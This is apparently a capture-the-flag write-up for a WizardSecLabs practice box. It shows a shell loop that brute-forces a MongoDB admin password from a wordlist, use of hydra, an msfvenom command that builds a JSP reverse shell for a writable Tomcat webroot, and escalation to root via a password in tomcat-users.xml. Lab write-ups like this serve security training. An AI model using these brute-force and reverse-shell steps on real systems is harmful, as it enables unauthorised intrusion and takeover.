WizardSecLabs Writeups

Writeups for all the WizardSecLabs boxes I have solved

View on GitHub



DATE: 9/10/2019



So quite a few ports open. I tried looking around those services but nothing made sense to me. After spending lot of time to find the proper foothold I deicded to ask @andreaz, he told me to do a full port scan to find something useful.

We can see that there is a mongodb server.


I tried to connect to it with admin user but it didn’t worked

for pass in `cat CTFs/lists/rockyou.lst`; do
    echo "Trying $pass"
    mongo --port 27018 -u "admin" -p "$pass" --authenticationDatabase "admin"

This script can help us dictinary attack the mongodb service.

We can see that iloveyou is the password. So you can also use

➜ mongo --port 27018 -u "admin" -p "iloveyou" --authenticationDatabase "admin"

I had usernames and password so I made a list for user and pass and passed them to hydra.

Then I logged in as chwaki:valentine and got user

Privilege escalation

The enumeration script didn’t gave away anything interesting except the fact that there were two user chawki and tomcat8. I started to look around but couldn’t find anything. Then I realized that the website on port 8080 said something about tomcat being installed on Catalina. So I searched around for some tomcat exploit with catalina and I came across Apache Tomcat 8/7/6 (Debian-Based Distros) - Local Privilege Escalation but this require us to be tomcat user.

Then I noticed that website also tells that tomcat is installed at /var/lib/tomcat8/webapps/ROOT/. So I decided to look at that directory and noticed that I have write permission in that directory that means I can make a new shell file and then visit it from website and it will be triggered.

➜ msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4444 -f raw > shell.jsp

Then placed it there

Then I used find command to see if I can find any interesting directory for tomcat8 user,

I noticed there was file named tomcat-users.xml and when I read the file I got the password for root user which I used to su root